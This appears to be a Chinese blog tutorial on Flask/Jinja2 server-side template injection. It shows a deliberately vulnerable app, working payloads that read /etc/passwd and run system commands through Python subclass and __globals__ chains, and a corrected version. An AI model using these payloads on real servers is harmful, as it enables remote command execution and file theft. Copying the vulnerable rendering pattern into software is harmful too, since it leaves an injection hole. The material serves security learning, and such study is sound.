Flask模板注入学习
#!/usr/bin/python3
# -*- coding: UTF-8 -*-
from flask import Flask, request, render_template_string
app = Flask(__name__)
def test_xss():
code = request.args.get('id')
html = '''
<h2>Test flask xss!</h2>
<h3>%s</h3>
'''%(code)
return render_template_string(html)
app.run()
http://127.0.0.1:5000/index/?id=1
http://127.0.0.1:5000/index/?id={{9*9}}
__class__ #返回类型所属的对象;
__mro__ #返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺序解析;
__base__ #返回该对象所继承的基类。__base__和__mro__都是用来寻找基类的;
__subclasses__ #每个新类都保留了子类的引用,这个方法返回一个类中仍然可用的引用的列表;
__init__ #类的初始化方法;
__globals__ #对包含函数全局变量的字典的引用。
"".__class__ >
<type 'str'>
>>> "".__class__.__mro__
(<type 'str'>, <type 'basestring'>, <type 'object'>)
>>> ''.__class__.__mro__[2].__subclasses__()
[<type 'type'>, <type 'weakref'>, <type 'weakcallableproxy'>, <type 'weakproxy'>, <type 'int
'>, <type 'basestring'>, <type 'bytearray'>, <type 'list'>, <type 'NoneType'>, <type 'NotImp
lementedType'>, <type 'traceback'>, <type 'super'>, <type 'xrange'>, <type 'dict'>, <type 's
et'>, <type 'slice'>, <type 'staticmethod'>, <type 'complex'>, <type 'float'>, <type 'buffer
'>, <type 'long'>, <type 'frozenset'>, <type 'property'>, <type 'memoryview'>, <type 'tuple'
>, <type 'enumerate'>, <type 'reversed'>, <type 'code'>, <type 'frame'>, <type 'builtin_func
tion_or_method'>, <type 'instancemethod'>, <type 'function'>, <type 'classobj'>, <type 'dict
proxy'>, <type 'generator'>, <type 'getset_descriptor'>, <type 'wrapper_descriptor'>, <type
'instance'>, <type 'ellipsis'>, <type 'member_descriptor'>, <type 'file'>, <type 'PyCapsule'
>, <type 'cell'>, <type 'callable-iterator'>, <type 'iterator'>, <type 'sys.long_info'>, <ty
pe 'sys.float_info'>, <type 'EncodingMap'>, <type 'fieldnameiterator'>, <type 'formatteriter
ator'>, <type 'sys.version_info'>, <type 'sys.flags'>, <type 'sys.getwindowsversion'>, <type
'exceptions.BaseException'>, <type 'module'>, <type 'imp.NullImporter'>, <type 'zipimport.z
ipimporter'>, <type 'nt.stat_result'>, <type 'nt.statvfs_result'>, <class 'warnings.WarningM
essage'>, <class 'warnings.catch_warnings'>, <class '_weakrefset._IterationGuard'>, <class '
_weakrefset.WeakSet'>, <class '_abcoll.Hashable'>, <type 'classmethod'>, <class '_abcoll.Ite
rable'>, <class '_abcoll.Sized'>, <class '_abcoll.Container'>, <class '_abcoll.Callable'>, <
type 'dict_keys'>, <type 'dict_items'>, <type 'dict_values'>, <class 'site._Printer'>, <clas
s 'site._Helper'>, <type '_sre.SRE_Pattern'>, <type '_sre.SRE_Match'>, <type '_sre.SRE_Scann
er'>, <class 'site.Quitter'>, <class 'codecs.IncrementalEncoder'>, <class 'codecs.Incrementa
lDecoder'>, <type 'operator.itemgetter'>, <type 'operator.attrgetter'>, <type 'operator.meth
odcaller'>, <type 'functools.partial'>, <type 'MultibyteCodec'>, <type 'MultibyteIncremental
Encoder'>, <type 'MultibyteIncrementalDecoder'>, <type 'MultibyteStreamReader'>, <type 'Mult
ibyteStreamWriter'>]
>>>
''.__class__.__mro__[2].__subclasses__().index(file) >
40
>
''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()
''.__class__.__mro__[2].__subclasses__()[40]('r'D:\vlun1.py').read()
''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].system('id')
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
{% for b in c.__init__.__globals__.values() %}
{% if b.__class__ == {}.__class__ %}
{% if 'eval' in b.keys() %}
{{ b['eval']('__import__("os").popen("net user").read()') }}
{% endif %}
{% endif %}
{% endfor %}
{% endif %}
{% endfor %}
#!/usr/bin/python3
# -*- coding: UTF-8 -*-
from flask import Flask, request, render_template_string
app = Flask(__name__)
def test_xss():
code = request.args.get('id')
return render_template_string('<h2>Test flask xss!</h2><h3>{{code}}</h3>', code=code)
app.run()
更多文章请前往:https://blog.csdn.net/qq_41490561
往期推荐